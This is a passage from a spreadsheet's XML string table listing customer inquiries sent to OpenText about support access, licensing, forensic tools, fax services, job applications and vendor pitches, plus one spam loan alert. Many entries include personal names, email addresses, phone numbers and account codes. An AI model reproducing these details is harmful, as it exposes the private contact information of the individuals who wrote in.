23435 Industrial Park Drive_x000D_
Farmington Hills, MI 48335</t>
  </si>
  <si>
    <t xml:space="preserve">Hi team,_x000D_
Currently we are planning for z/OS 2.2 upgrade for  our customer. Can you please let us know if those products are supportable or not? If this is wrong group, can you please forward to correct support group._x000D_
_x000D_
1.Product name -&gt;Expedite Base/MVS_x000D_
What is minimum level of Product to upgrade for z/OS 2.2 =&gt;_x000D_
What is maximum level we can use product to upgrade for  z/OS 2.2 =&gt;_x000D_
Which is the correct version of product  to upgrade z/OS 2.2 =&gt;_x000D_
Upgraded version will run on z/OS 1.13 or not =&gt;_x000D_
what are the older level which will support z/os 1.13 , 2.2 and Z14 box  also ? =&gt; _x000D_
Product will support z14 hardware or not , if yes, what fixes are require and if not, what version we need to upgrade to support z14=&gt;_x000D_
_x000D_
_x000D_
_x000D_
Please let me know if you need more information._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Is OpenText DM available on MAC? </t>
  </si>
  <si>
    <t>Hi,_x000D_
We are exploring the suitable DMS/Archiving solution that would work with S/4 HANA. We would like to know the OpenText capabilities, could you please point us to the right SME who could provide more information._x000D_
Regards,_x000D_
Alex Pradeep</t>
  </si>
  <si>
    <t>What options do we have to report on email bounce back cases? Also, Print failures?_x000D_
_x000D_
We want to build a program in SAP ECC to pull a list of invoices that encountered an error for any reason for email and print scenarios. Is there an API in open text(SDP) system that we can call from SAP ECC?</t>
  </si>
  <si>
    <t>I want to Integrate Wix toolset with Open Text Team developer._x000D_
Is it possible.</t>
  </si>
  <si>
    <t>Can't connect to My Support in order to open a new ticket.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are one of the fastest growing taxi  company in Reading and surrounding areas and cover all the jobs from local to corporates  jobs._x000D_
_x000D_
we are currently serving 'Bayer' in green Park, Pharmacosmos, REL, EDMI, Blackduck, The Oratory School, Oakbank School, Premier Inn Central and South, and George Hotel as well as Quality hotel to the name a few of our clients who have shown trust and are making most of having opened an  account with us.  Our latest new Clients are Holiday Inn (South) Reading Both of the Grosvenor Casinos as well as The Trunkwell House Hotel in Beech Hill who are immensely happy and satisfied with the services they were offered during all time._x000D_
Further all our Cars are of executive standards and are  equipped to take payments via cards in cars which is becoming increasingly popular these days although we accept other methods of payments as well._x000D_
 _x000D_
As an account holder , we don't have to worry about making payments there and then  as  monthly itemised invoice would be generated at the end of each month so that all the journeys are completed without having to worry about the payments at all. It’s entirely up to you though to choose which methods would be most convenient._x000D_
_x000D_
Please do not hesitate to contact us if you would have any further queries in this regard. _x000D_
_x000D_
Looking forward to hear from yourself very soon._x000D_
_x000D_
Regards _x000D_
Rajeev Kaushal</t>
  </si>
  <si>
    <t>I would like to be partner in your human resources management group, being a Filipino Canadian with 30 years experience at senior  HR management level in Filipino,Canadian and American companies.</t>
  </si>
  <si>
    <t>We have the Archive server down and require urgent help to bring it up.</t>
  </si>
  <si>
    <t>Hi, Blackberry acquired Encription in 2016 and i believe they had an EnCase 7 license.  I'd like to speak with someone about replacing that dongle (which has since gone missing) and purchasing a new license and support for out forensic team.</t>
  </si>
  <si>
    <t>BMW Group emails regarding invoicing via opentext - trying to find out more about what it involves - likely costs</t>
  </si>
  <si>
    <t>Hello,_x000D_
I have issues reaching "My Support" after changing my E-mail address from istone to columbusglobal. _x000D_
My account is since before connected to customers "Seco Tools" and "Bertegruppen/SIA Glass". I need to find information regarding ExStream 16 and also Streaqmserve 5.6.2. Please, activate my new E-mail address with same access as before. I need this ASAP._x000D_
BR_x000D_
Mikael</t>
  </si>
  <si>
    <t>Dear support,_x000D_
we received the below mail from delivery team for the training but when we are trying to register but no response,so kindly help us to get the training_x000D_
_x000D_
_x000D_
    _x000D_
    DF120 — Foundations in Digital Forensics with EnCase OnDemand_x000D_
    DF210 — Building an Investigation with EnCase OnDemand_x000D_
    DF320 — Advanced Analysis of Windows Artifacts with EnCase OnDemand_x000D_
    _x000D_
    Please make sure the customer uses Ref# 122216 (add to comment field)_x000D_
_x000D_
Regards_x000D_
Pothiraj Veluchamy_x000D_
+93729130029</t>
  </si>
  <si>
    <t>I'm Unable to login to OpenText Connect --&gt; it says No Access as below :_x000D_
---------------------------------------------------------------_x000D_
OpenText Connect_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
Request confirmation email_x000D_
------------------------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Dear Concern, _x000D_
_x000D_
Greetings from eGeneration Ltd. Please provide price quotation of OpenText EnCase Forensic ( 3 years SMS Renewal).  It will be great if you can provide the quotation by today. _x000D_
_x000D_
For any more info please feel to contact me.</t>
  </si>
  <si>
    <t xml:space="preserve">Not able to access My support page using my ID. </t>
  </si>
  <si>
    <t>Hello, I'd like to take a look into the OpenText Documentum for Life Sciences 16.4 Release Notes. Can you provide a PDF or a download URL to me? Thank you!</t>
  </si>
  <si>
    <t>I have my access created in the login OpenText link. But I would need access to Knowledge base and My Support. I have completed the "Confirm Registration" for these, but I am not able to access. Could you please help in getting for this id access to these two OpenText sites (i.e. Knowledge base and My Support)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText Recruiter,_x000D_
I am a first year computer science student at the University of Toronto seeking an entry‐level summer internship position in software development or testing. I live in Kitchener-Waterloo, Ontario._x000D_
Please let me know if you can take a look at my resume._x000D_
Thank you for your consideration! </t>
  </si>
  <si>
    <t>do you have Chinese EDI implementation team? if yes, could they contact me to understand your implementation process, software functions, cost, thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please ask your technical team to assist us._x000D_
Our Information Security &amp; Sourcing have asked to revisit a subset of questions for Information Security, DR &amp; BCP._x000D_
</t>
  </si>
  <si>
    <t>We're after an NFS client to work with Windows Server 2008 and above. Perhaps also an NFS Gateway that can play that role.</t>
  </si>
  <si>
    <t>Estimados, muy buenas tardes: Necesito información sobre su plataforma el numero de usuarios de 90,000 a 100,000. Agradezco me comenten características, si es posible realizar un demo, y la forma de licenciamiento si es perpetuo, o a través de suscripción por un determinado tiempo.</t>
  </si>
  <si>
    <t>I had an account with a company - I believe called efax which apparently became part of open test at some point. At that time 5-6 years ago I had a need to make a fax once or twice a year. that hasn't been true for a couple of years and the involvement of Open Text was never made clear to me. I no longer wish to have an account. After a couple of hours on the phone in early October I believe my account was canceled. I cannot confirm that I paid for the 2017 year (although I wasn't using the service at that time. I made a payment at your request today 2/18/19._x000D_
Please do not bill me further. Your company isn't usable for a home user anyway - which is what I was.</t>
  </si>
  <si>
    <t>I am attempting to apply for the VP Global Indirect Sales but unable to in the OpenText system - keep getting error. Is there another way to submit my cover letter and resume? Thank you.</t>
  </si>
  <si>
    <t>I cant register my producto license, and i cant download the last versión of Encase Forensic._x000D_
I have my dongle and my count in opentext.</t>
  </si>
  <si>
    <t>Need information about licensing and quote for Documentum.</t>
  </si>
  <si>
    <t xml:space="preserve">Please help I cannot get hold of anyone at Hightail who can help me.  </t>
  </si>
  <si>
    <t xml:space="preserve">no access to FCA team center, need help asap_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are at the first stage of looking for an eTMF solution for ou company, and we saw yours over the internet._x000D_
Would it be possible for schedule a call to discuss about the main features of your eTMF system and what pricing to expect for your system (high level pricing would be sufficient)._x000D_
Regards,</t>
  </si>
  <si>
    <t>I am interested in purchasing HostExplorer software for my department.  I would appreciate a price quote.  Please call me Monday-Friday. 9:00-5pm.  _x000D_
_x000D_
Thank you in advance,</t>
  </si>
  <si>
    <t>Every time I send out a fax2mail email, I get an email with an error that says "You need to be authorized to use this service. Authentication failed"</t>
  </si>
  <si>
    <t xml:space="preserve"> I am interested in your VP of indirect sales position. I saw it on Glassdoor.   My background crosses deep experience in IT, sales, creative, training, communications, media, PR and more with hands-on skills that’s in these areas as well as global leadership in all.   Executive level sales and sales training is very much in my expertise   Would prefer to speak directly to get to know more about your company. </t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in finding out if OpenText has an Enterprise Content Management solution to fit our needs.  </t>
  </si>
  <si>
    <t>Manoj</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
We could have a demo on your product Fax Solutions. Do you have a partner or someone on your sale department who can contact me so I can explain our project? _x000D_
We are located at 550, rue Sherbrooke Ouest, Étage 4, Montréal (QC) H3A 1B9_x000D_
Regards_x000D_
</t>
  </si>
  <si>
    <t>We are interested in the fax2mail service and need to find out if it is compatible with the software program we currently use, PioneerRx.</t>
  </si>
  <si>
    <t>Could I get specifications, including cracking speed, and pricing for the TPR1 please.</t>
  </si>
  <si>
    <t>I am working with a customer where we have identified some .ald files [Alchemy]. and need to export the documents out of them.  We will have access to the document repository.  We would like to build this environment with our virtual environment.  I have been informed that [Open Text Alchemy Document Management] would be the appropriate application for this.  Do you have any trial version that we can set up and test and/or a copy we can license for 45 days [the duration of this project].  Please advise when you can regarding our options.</t>
  </si>
  <si>
    <t>Would like to speak with a Sales individual to get more information on your service.</t>
  </si>
  <si>
    <t>Hello_x000D_
I work in Tax department and I send you this message to have a discussion with sanofi account Manager. I know that sanofi worked with you to put in place "any" solution_x000D_
 I have some question around the solution, to check if it fits with our needs_x000D_
Thanks for your answer</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We would like to open an Opentext account so we can upload our UPC’s to GXS Catalogue._x000D_
Please see below credentials and advise how to proceed?_x000D_
Company Name: Novo Fashion USA Ltd_x000D_
GS1 Company Prefix: 08400559_x000D_
GLN: 0840055900005_x000D_
_x000D_
Thank you, _x000D_
EUGENE BOCA_x000D_
EDI, Logistic &amp; Invoicing Coordinator| TRIMERA SWIM_x000D_
TRIMERA BRANDS_x000D_
1350 MAZURETTE #409_x000D_
MONTRÉAL, QC, H4N 1H2_x000D_
T:  514-381-2365 x 5505 _x000D_
F:  514-336-5293_x000D_
M: 438-869-9227_x000D_
eboca@trimerabrands.com</t>
  </si>
  <si>
    <t>We have 60,000 customer invoices annualy and are looking for an OCR software. Generally out invoices come in through email but some come in through regular mail. The software we are looking for needs to be able to pull PDF's from an inbox in Outlook, select key fields, allow our CSR's to validate the data, and finally load that data into Salesforce via an integration. The key fields need to be pulled at a line level. Do you have a solution that fits these needs?</t>
  </si>
  <si>
    <t>Hello, I have some questions regarding Encase eDiscovery regarding which technologies (Servers, Databases, etc.) it covers and scans for PII Data, specially related to Data Containers. Can someone please get back to me on this?</t>
  </si>
  <si>
    <t>Buenos días, _x000D_
nos gustaría saber qué formación o formaciones son las más adecuadas para aprender a usar Opentext como Gestor Documental fuera de SAP._x000D_
Quedo a la espera de sus comentarios, gracias._x000D_
Un saludo, Patricia Sierra</t>
  </si>
  <si>
    <t>We are using Actuate IServer 8 at this point. We are trying to see if there is any upgrade options of the software. Please email or call me. _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">We are using Actuate IServer 8 now. We are trying to see if there is any upgrade options that will bring out software to the newest version of IServer._x000D_
_x000D_
Please email me at robertqi@unifocus.com or call me at 972-512-5127._x000D_
_x000D_
Thanks you! </t>
  </si>
  <si>
    <t>I am interested in the BIRT Training, do you still have classes throughout the US?</t>
  </si>
  <si>
    <t>Looking to see if OpenText Enterprise Connect has a connector/integration client for Nuance PowerPDF and Foxit Phantom PDF.</t>
  </si>
  <si>
    <t>We are not a customer and have been charged 48.82 for open text.  Our company is BBK Technology.  Date of charge is 1/22.  Please call for the charge card no.  I can be reached at 602.717.8888</t>
  </si>
  <si>
    <t>I'm trying to download the free tool "EnCase Forensic Imager", which should be a simple task since it is supposed to be free, stand-alone etc. However, trying to download the software from Guidance website I am redirected to your site where I have to register. I registered and confirmed the email-link, and tried yet again to download the free tool. But I'm not able to since I haven't registered for my-support. I don't want to pay for my-support just to download a free tool, - furthermore I don't need support at all for this free tool._x000D_
_x000D_
Why did you make it unnecessary complicated to download a free tool? How do I download it? Why don't you make a simple download section?_x000D_
_x000D_
Regards, Nicolai</t>
  </si>
  <si>
    <t>Our congenial customer SMT Bouw installed the Plugin Edocs in an outlook on an RDS server. But the add-in in outlook of edocs does not remain active. if your add-in is switched back on again when restarting outlook!_x000D_
Are you familiar with this problem? and if so How can we ensure that edocs add-in remains active in outlook.</t>
  </si>
  <si>
    <t>Hello, I would like to receive access to the customer support portal for Encase / Guidance Software products to access manuals and software downloads. I work at PwC and they have a globla agreement for all licenses, with the most recent transaction nr. for extension being: RR000000008044+R31-MAY-17 09:55:48._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>I am trying to open a new support ticket.   The account a try to log in under (aengberg@compuone.com) says I am not registered.   Could you check the status of product support license?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi, just a short question. We are running CTD 6.1 SP1. For compatibility reasons (WIN10) we have to upgrade to CTD 6.3 SP?, as mentioned in the compatibility list._x000D_
Is it correct that this upgrade from 6.1 to 6.3 as an minor upgrade is free of charge?_x000D_
We discussed this in our WIn10 Team, now i look for a answer from 'first hand'._x000D_
thank you _x000D_
best regards Peter</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, _x000D_
I work for SAP at my customer Standard Bank of South Africa. _x000D_
They are currently looking for someone that would be able to provide them training on EFM. _x000D_
Would you be able to connect me with someone that could assist in discussing training options for them ? </t>
  </si>
  <si>
    <t xml:space="preserve">we had old Guidance accounts:_x000D_
1) software@itforensic.nl_x000D_
2) software@itforensic.com_x000D_
_x000D_
I tried to migrate to  a new email adres within our company domein (fis-software@nl.gt.com)_x000D_
_x000D_
i am stuck and i can't get it to work._x000D_
_x000D_
please remove old accounts_x000D_
leave new account  fis-software@nl.gt.com_x000D_
please connect our account:   Grant Thornton Forensic with End User Code : 10429385_x000D_
_x000D_
I need access to software etc.. Encase and Tableau_x000D_
_x000D_
My Personal Company email is patrick.barmentlo@nl.gt.com_x000D_
_x000D_
please fix this for us, thank you so much!_x000D_
_x000D_
awaiting your soonest reply_x000D_
_x000D_
Regards_x000D_
Patrick_x000D_
</t>
  </si>
  <si>
    <t>We need solution for Process Automation and Document Management .</t>
  </si>
  <si>
    <t>We're having troubles using the support page and downloading the software package through the link provided in the license file:_x000D_
Order Number: 1352363 (PO#CD18073505E)</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to request a formal meeting with you to determine whether we can be an asset to your organisation with regards to tendered projects, permanent or temporary staffing, skilled and unskilled workers as well as learnerships with regards to projects or project leads. _x000D_
_x000D_
We would also like to determine the challenges that you currently face as well as how we can provide you with a cost effective and quality service solution our main drive is always production for the client._x000D_
_x000D_
The paragraphs below will give you an idea about who we are and what services we have to offer._x000D_
_x000D_
Workforce Staffing is one of the largest companies in South Africa with regard to recruitment and staffing nationwide, we also have other services to offer with regard to learnerships and health and safety. We manage roughly 45000 workers per week and weekly salaries of over 68 million rand. _x000D_
_x000D_
We are specialists in recruitment, quality staffing and management of :_x000D_
_x000D_
-	Permanent Placement of any type of Worker_x000D_
-	Temp Workers _x000D_
-	General Workers_x000D_
-	Construction workers _x000D_
-	Highly Skilled Workers _x000D_
-	Seasonal Workers_x000D_
-	Contingency Workers_x000D_
-	Any type or skilled worker that you may require we can supply. _x000D_
-	Consultants_x000D_
-	Safety Management_x000D_
-	Engineers_x000D_
_x000D_
_x000D_
Services we offer :_x000D_
_x000D_
-  HR &amp; IR related matters_x000D_
-  Contracts _x000D_
-  Salary Processing_x000D_
-  Payroll_x000D_
-  PPE_x000D_
-  Medical testing_x000D_
-  Screening of employees we offer_x000D_
-  Staffing Contingency during strikes_x000D_
-  Flexible pricing structures _x000D_
- Compliance with legislation_x000D_
_x000D_
Find attached our business profile of our service offering for your attention._x000D_
_x000D_
The companies and clients we do business with become more than just a rand value we make sure and build a healthy lasting relationship that benefit both employer and employee._x000D_
_x000D_
Kind Regards_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>In regards to the EnCase table columns, can you please specify what the difference is between "Is Deleted" and "File deleted". The reason Im asking is because I have noticed that they "do not talk to each other"._x000D_
_x000D_
Thank you and regards,_x000D_
Siphokazi Mbombo</t>
  </si>
  <si>
    <t>How can we make partnership with OpenText?</t>
  </si>
  <si>
    <t>I am searching for a job at open text</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I applied for the Sales Manager role in Sydney via your website, but the window just shut down as soon as I hit 'next' after uploading my cover letter and CV, with no confirmation - it just flicked back to the register/ sign in page. It won't let me sign in stating incorrect password, but won't let me reset password. I just want to check that the application went through, or whether I need to do it again and there is a direct email I could use?_x000D_
_x000D_
Kind regards_x000D_
Holly Booty</t>
  </si>
  <si>
    <t>_x000D_
OPPORTUNITY ALERT:_x000D_
Don't let yourself fall behind on your bills. Get the funds you may need._x000D_
 _x000D_
Amount Available	View Amount_x000D_
EMAIL	lya.anouar@gmail.com_x000D_
DATE	02/17/2019_x000D_
OPPORTUNITY STATUS	PENDING  _x000D_
View Qualifications</t>
  </si>
  <si>
    <t>Seeking medium to long term contract to medium sized technology companies in need of strategic growth planning with emphasis on Sales and Marketing Performance Management providing sales processes, implementation focus and results driven experience.  Willing to travel.</t>
  </si>
  <si>
    <t>I have been a fax2mail subscriber for a number of years now.  My debit card expired and I cant access my account to update the payment info._x000D_
_x000D_
I called and left a few messages before.  Can someone please call me for support._x000D_
_x000D_
my phone number is 815-455-9529_x000D_
the fax number is 815-893-7606</t>
  </si>
  <si>
    <t>Hello i'm interested in your product to search for content in large amounts of Arabic epub files._x000D_
_x000D_
thank you</t>
  </si>
  <si>
    <t>Updating electronic fax system..discuss options</t>
  </si>
  <si>
    <t>Hi_x000D_
I’m trying to apply for a Sales Account Executive Role/Swedish speaker but any google drive won’t let me upload my CV_x000D_
Could I apply direct through my e mail?_x000D_
Best Regards _x000D_
Bonnie Engstrom Shack</t>
  </si>
  <si>
    <t>Issue with ADA services</t>
  </si>
  <si>
    <t>I was employed with Global 360 back just before the acquisition and I have a letter from Social Security indicating a Retirement Savings account reported by Global 360 back in 2011. I need contact information for the person I need to follow up with to find out more about this so I can retrieve and funds owed to me._x000D_
_x000D_
Eugene Terry Schurter</t>
  </si>
  <si>
    <t>Good morning._x000D_
Is the "Tableau td3 forense imager kit" be able to copy a sata hd to a smaller one if the partitions on the source disk are not full? (or we need to have always same size disks...)_x000D_
Es: If i have a (1Tb) source disk with only a partition full for 30%... could i copy it on a 500Gb sata ssd ?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>I am trying to import a custom field from the BHF to BatchCust1 in the auto-generated batch.  This is the last thing I need to get everything going.</t>
  </si>
  <si>
    <t>I was a former student at Cal State Fullerton's Computer Forensics Program.  The program no longer offers courses, and I was given a student version of the EnCase dongle to use with what I believe is version 6.  One used to be able to download the legacy versions, but now it appears it is not possible.  I wanted to know if it is possible to obtain a downloadable version of the 6 EnCase software to keep learning with the current dongle that I have?  I know it may be a long shot, but any help would be appreciated!_x000D_
Thank you,_x000D_
-Eric</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
We are doing some data cleanup and need your W-9 for 2018 along with verification of remit to address for the following;_x000D_
Remit #19550_x000D_
Liaison Technologies, Inc._x000D_
DEPT AT 952956_x000D_
Atlanta, GA 31192-2956_x000D_
Thanks </t>
  </si>
  <si>
    <t>Do you work with re-sellers and if so would it be possible to have a re-seller quote for EnCase Forensic 8.08 from Guidance Software – 2 Licences and X-Ways Forensics – 2 Licences. Thank You</t>
  </si>
  <si>
    <t>I have Brava! Desktop IXL and have printing issues where the text, lines,etc can not be read unless I change to pure Black &amp; White and/or print as Black only. Never had this issue before. Same printers (yes, more than one). Is there a patch, upgrade, whatever to fix this?</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for WFM solution and would like to see a demo. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
How do I register for Documentum System Administrator exam? How much is the exam fees?_x000D_
In "Documentum D7 Administrator Certification" link, I receive the training information. However, I am not willing to take training and need to find a way to register the exam directly. Please advice._x000D_
_x000D_
Thank you,_x000D_
Pramod Shinde</t>
  </si>
  <si>
    <t>My developer cannot download Rightfax 16. We do not know who is the admin to provide him access. Is there a way we can identify the admin or provide him access? We purchased Rightfax from HMB Incorporated. The PO number, if that will help is P010237152. The HMB POC is Brooke Rolfe - brolfe@hmbnet.com.</t>
  </si>
  <si>
    <t>I was unable to view the live webinar for "Valuable New Features of the Tableau TX1 Forensic Imager” by Jeff Hedlesky and I had a couple questions on the features that were talked about._x000D_
_x000D_
1) The Target Disk Mode (TDM) doesn't seem to work as explained when using a Mojave MacBook in TDM connected to the TX1. The MacBook will display both the Thunderbolt and USB icon, and when connected, shows only the USB Icon. That gives me the impression that it's connecting but something is not working with "spoofing" on the TX1 side to have it properly connect._x000D_
_x000D_
2) The second concern I have is I cannot get the TX1 to mount our network storage. I am able to mount a shared folder on a Windows 10 machine just fine. I'm not sure what the problem would be with connecting to the network storage.</t>
  </si>
  <si>
    <t>Teleform license and software pricing</t>
  </si>
  <si>
    <t>CI</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
We did not get the January invoice for account 854607-Pacific Dental Services. Could you email it to me and itap@pacden.com?_x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">having some issues migrating old guidance accounts._x000D_
have updated our account with new 'generic'  email adres (fis-software@nl.gt.com)_x000D_
I can login, but can not do anything else as it tells me my email is not verified._x000D_
i requested multiple times, the ' validate email adres'  link but are not getting it._x000D_
_x000D_
we had 2 old accounts:_x000D_
software@itforensic.com_x000D_
software@itforensic.nl_x000D_
_x000D_
we want to eliminate those and have our encase contracts within one account ( fis-software@nl.gt.com )_x000D_
_x000D_
Accountname : Grant Thornton Forensic_x000D_
End User Code = 10429385_x000D_
_x000D_
we have 2 encase licences and a bunch of tableau hardware._x000D_
we need access again to software downloads and other supporting  stuff._x000D_
_x000D_
Awaiting your soonest reply_x000D_
_x000D_
Patrick Barmentlo_x000D_
patrick.barmentlo@nl.gt.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Inquiries on how to be a speaker</t>
  </si>
  <si>
    <t>Hi.  We are currently using the Opentext Exstream product to create PDF files for print / mail. I've been asked by our CIO to pursue options regarding e-delivery solutions. I'm not sure who our account rep is.  I would appreciate some feedback as to how I can pursue this. Thanks.</t>
  </si>
  <si>
    <t>Software EDMS</t>
  </si>
  <si>
    <t xml:space="preserve">We have a contract with you and have a couple questions:_x000D_
_x000D_
-Do we have a direct POC with Open text_x000D_
_x000D_
-How long do you foresee keeping our platform active._x000D_
_x000D_
-Do they offer any other products that could work just like workflow (our customized program on your platform)._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I need to know the system requirements for Opentext Documentum v16.  I cannot find any documentation for this product on your web site and I cannot create an account because I do not have a 'customer number'.  I have a request to add Windows Server 2012 to the platform class on our Documentum record and I need to verify that it is compatible with this OS.  Thanks. </t>
  </si>
  <si>
    <t>I simply wish to download EnCase forensic imager, which is stated to be free and not require a license, but after filling out the form to get access to the download on the guidancesoftware site, clicking the button to download simply refers you to this site.  I have registered on this site but that does not give me access to download the application as it is presumably inside the 'My Support' section, which requires a contract for access._x000D_
Assuming the guidancesoftware site is accurate, and EnCase Forensic Imager is still free, could I please be provided a means by which I can obtain it._x000D_
Thank you._x000D_
Aaron</t>
  </si>
  <si>
    <t>Do you provide Desktop Management Services, and are able to provide a quote or spec sheet of your services? Thank you in advance for your response.</t>
  </si>
  <si>
    <t>I need change email in account Radovan.Schiffer@syconix.com to Radovan.Schiffer@sabris.com for change password_x000D_
Thanks_x000D_
Regards_x000D_
Radovan Schiffer</t>
  </si>
  <si>
    <t>Hello,  We have had a charge post to our bank account.  According to the information I was able to gather, the individuals who set up the Zubie account are no longer here.  Both Julie and Holly have left the organization.  Can you please provide information on how we can update the users on this account? As well as have access._x000D_
_x000D_
Thank you_x000D_
_x000D_
Natasha Tandeski_x000D_
Zubie Inc.</t>
  </si>
  <si>
    <t>We will be cancelling the software maintenance/support on one of your products.  What address should we send the termination letter to?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello ,_x000D_
We would like to get a quote for a bundle of 10 Brava Desktop IXL-C licenses_x000D_
We thank you for processing our request quickly._x000D_
</t>
  </si>
  <si>
    <t>WE are using Diga D2 for documentation management_x000D_
I'd like to know if you have a solution for documentation reconciliation (For GMP Forms)</t>
  </si>
  <si>
    <t>We are interested in offering a documentary manager to one of our customers that covers all their needs:_x000D_
_x000D_
- "Tag" documents to simplify searches._x000D_
_x000D_
- Documents need to pass an approval flow._x000D_
_x000D_
- Users permissions can be set and modified._x000D_
_x000D_
- Ability to connect or "link" several documents._x000D_
_x000D_
- Ability to integrate external API to upload several documents to your platform or provide a tool to achieve that._x000D_
_x000D_
- Search engine must find matches both in the document itself and in labels._x000D_
_x000D_
- Ability to sign documents digitally or using other ways._x000D_
_x000D_
- Ability to integrate with other systems._x000D_
_x000D_
 _x000D_
_x000D_
First of all, we need to accomplish customers requirements and, of course, we need to know the approximate price of the solution and compare with others offers._x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>I need pricing for some renewal licenses for my client.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - we are looking to integrate Open Exstream with Salesforce.  I need to understand the licensing as well as the costs involved.  </t>
  </si>
  <si>
    <t>ECM</t>
  </si>
  <si>
    <t>We are using FileNet Image Services for storing the legal documents. The growing new business requirements like document management workflow and review process for legal documents which the current version of FileNet doesn’t support and also the version 4.0 of FileNet is having very minimum tech support that is no longer having any enhancement support available, we are looking for alternate product that can bring down the cost as well as provide the required features for collaborative document management with high security framework like Documentum.</t>
  </si>
  <si>
    <t>Kindly need support immediately to solve Case360 cannot bring up the service</t>
  </si>
  <si>
    <t xml:space="preserve">Please help, our case360 cant up after restart._x000D_
_x000D_
Please call asap </t>
  </si>
  <si>
    <t>I want access to My Support portal. Kindly provide me same level of access as of my colleague , Dibya.Pattjoshi@exeloncorp.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope that everything is well today! Driven by its vision to tell stories that will inspire people and eventually change lives, Firestarters Productions Inc. has been committed to deliver quality outputs and award-winning campaigns over the years. _x000D_
_x000D_
We would like to request for a meeting on any day that will be convenient for you so we can present our company profile personally._x000D_
_x000D_
We hope that we can share our ideas for your future marketing needs, and we look forward to work with you soon! Please feel free to contact me through this email, or at 09154839398._x000D_
 _x000D_
Thank you so much!_x000D_
_x000D_
_x000D_
Kindling your fire,_x000D_
_x000D_
Josh</t>
  </si>
  <si>
    <t>CF</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
_x000D_
I am Sanjeev Yadav,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Sanjeev Yadav</t>
  </si>
  <si>
    <t>I am interested for EnCE international exam. Can you please advice where to go for the "64 hours of authorized Computer Forensic Training"?  Thanks.</t>
  </si>
  <si>
    <t>Do you have any web based training courses with Content Server 16.2? Any type..?</t>
  </si>
  <si>
    <t>Acquire access to resources</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to request a W-9 form from Open Text/Hightail for our records. Thank you!_x000D_
Tamra</t>
  </si>
  <si>
    <t>We are currently using TrustedLink Enterprise version 6.1.1. We are considering upgrading and would like to know what the latest version is and information on the enhancements. Thanks</t>
  </si>
  <si>
    <t>Need to understand licensing and capabilities of Documentum.</t>
  </si>
  <si>
    <t>I am looking for some guidance/assistance on using Microsoft SCCM to push installations of the Right Fax Client</t>
  </si>
  <si>
    <t>Do you guys sell a write-blocker/adapter for a B+M key'd SATA M.2. disk?  You guys have an M.2. adapter for PCIe but need something for SATA with m.2.</t>
  </si>
  <si>
    <t>I am not receiving any password reset emails. I have waited 18 hours and checked my spam folder, and there is still nothing there. _x000D_
There is a job posting I wish to apply to, but cannot due to this. Upon submitting the form for the first time, it showed that my email address was already associated with a user, so an account does exist._x000D_
Thank you.</t>
  </si>
  <si>
    <t>My division has a growing directory of documents (roughly half a TB), which we currently store on our local file share (network drive). We would like to know if OpenText provides a solution whereby the data and documents can be migrated to a location, such that it will be possible for colleagues from another company to view those documents from that location.</t>
  </si>
  <si>
    <t xml:space="preserve">How can I obtain Guest pass as noted?_x000D_
     Bringing someone with you Enterprise World? We have a special pass for you! This pass includes admission to Tuesday’s kick-off reception, Thursday’s closing event and information on registering for local Toronto and Niagara tours._x000D_
My guest is over 19 years of age._x000D_
Also, what hotel is recommended? _x000D_
Thanks, Michaeo_x000D_
</t>
  </si>
  <si>
    <t>I have access/login issues to OpenTest Support forums in-order to post my queries wrt Documentum. We have high impact production issues to be resolved urgently/asap.</t>
  </si>
  <si>
    <t xml:space="preserve">me interesa conocer mas a detalle tu plataforma </t>
  </si>
  <si>
    <t>Dear Sir /Madame,_x000D_
_x000D_
today I' ve asked the registration for  "3-8801 InfoArchive Administrator 16.3 On demand" for 2 students (gam@globoinformatica.com and hla@globoinformatica.com) but now is no more necessary because we can use Learning on Demand (LoD) Subscription._x000D_
So we do not need no more this "Demand training"_x000D_
Please advice me if there is any other information I have to provide_x000D_
Thanks a lot for your collaboration_x000D_
Best regards_x000D_
_x000D_
Paolo Abrile</t>
  </si>
  <si>
    <t>Team,_x000D_
_x000D_
We have a GPO Policy which locks the system after 15mins if its inactive, but its not working if Open Text Exceed Application is open._x000D_
_x000D_
Operating System Version: Windows 10</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name in Nicole Villari and I am a consultanct for a pharmaceutical company based in Cambrdige, MA.  The company is interested in implementing a document management system, and I was hoping you would be able to provide me with some information regarding the capabilities of Documentum._x000D_
_x000D_
Thank you,_x000D_
Nicole Villari_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
